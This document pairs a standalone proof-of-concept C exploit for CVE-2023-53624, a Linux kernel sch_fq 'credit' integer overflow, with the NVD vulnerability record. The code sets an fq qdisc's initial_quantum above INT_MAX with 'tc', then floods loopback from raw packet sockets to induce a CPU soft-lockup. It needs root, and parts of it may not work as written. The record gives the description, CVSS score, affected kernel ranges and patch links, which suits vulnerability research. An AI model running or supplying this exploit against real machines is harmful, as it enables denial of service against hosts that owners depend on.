CVE-2023-53624

// PoC for CVE-2023-53624: Linux kernel sch_fq integer overflow // Trigger CPU soft-lockup via integer overflow in "credit" variable // Requires: root or CAP_NET_ADMIN privilege #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_packet.h> #include <linux/if_ether.h> // Use 'tc' command to configure sch_fq with overflow value // This is the primary trigger for the vulnerability void trigger_overflow() { printf("[*] Configuring sch_fq with initial quantum > INT_MAX\n"); // Add qdisc with fq scheduler system("tc qdisc add dev lo root fq"); // Try to set initial quantum to a value > INT_MAX (2147483647) // This will cause signed integer overflow in 'credit' system("tc qdisc change dev lo root fq initial_quantum 2147483648"); printf("[*] Configuration applied, creating traffic to trigger soft-lockup\n"); } // Create multiple sockets to generate new flows // Each new flow will use the overflowed credit value void generate_traffic() { int sockets[100]; struct sockaddr_ll addr; memset(&addr, 0, sizeof(addr)); addr.sll_family = AF_PACKET; addr.sll_protocol = htons(ETH_P_IP); addr.sll_ifindex = if_nametoindex("lo"); // Create many packet sockets to trigger flow creation for (int i = 0; i < 100; i++) { sockets[i] = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_IP)); if (sockets[i] < 0) { perror("socket"); continue; } bind(sockets[i], (struct sockaddr *)&addr, sizeof(addr)); } // Send packets to create flows for (int i = 0; i < 100; i++) { if (sockets[i] >= 0) { char buf[64] = "trigger"; sendto(sockets[i], buf, sizeof(buf), 0, (struct sockaddr *)&addr, sizeof(addr)); } } // Cleanup for (int i = 0; i < 100; i++) { if (sockets[i] >= 0) close(sockets[i]); } } int main() { printf("=== CVE-2023-53624 PoC ===\n"); printf("Linux kernel sch_fq integer overflow\n\n"); if (getuid() != 0) { printf("[!] This PoC requires root privileges (CAP_NET_ADMIN)\n"); return 1; } trigger_overflow(); sleep(1); generate_traffic(); printf("[*] Done. Check dmesg for soft-lockup warnings\n"); // Cleanup system("tc qdisc del dev lo root"); return 0; }

{"cve": {"id": "CVE-2023-53624", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:45.190", "lastModified": "2026-02-05T14:32:24.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_fq: fix integer overflow of \"credit\"\n\nif sch_fq is configured with \"initial quantum\" having values greater than\nINT_MAX, the first assignment of \"credit\" does signed integer overflow to\na very negative value.\nIn this situation, the syzkaller script provided by Cristoph triggers the\nCPU soft-lockup warning even with few sockets. It's not an infinite loop,\nbut \"credit\" wasn't probably meant to be minus 2Gb for each new flow.\nCapping \"initial quantum\" to INT_MAX proved to fix the issue.\n\nv2: validation of \"initial quantum\" is done in fq_policy, instead of open\n coding in fq_change() _ suggested by Jakub Kicinski"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.12", "versionEndExcluding": "5.10.180", "matchCriteriaId": "9E182C32-07C7-4046-B30D-6715AC884672"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.111", "matchCriteriaId": "2B9DD776-7F17-4F72-B94F-54BFCBC692DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2322462d6f9ad4874f4e3c63df3b5cc00cb1acbd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4b8a05e3801661a0438fcd0cdef181030d966a5a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4fbefeab88c6e79753a25099d455d3d59d2946b4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7041101ff6c3073fd8f2e99920f535b111c929cb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/85f24cb2f10b2b0f2882e5786a09b4790bb3a0ad", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d0b43125ec892aeb1b03e5df5aab595097da225a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}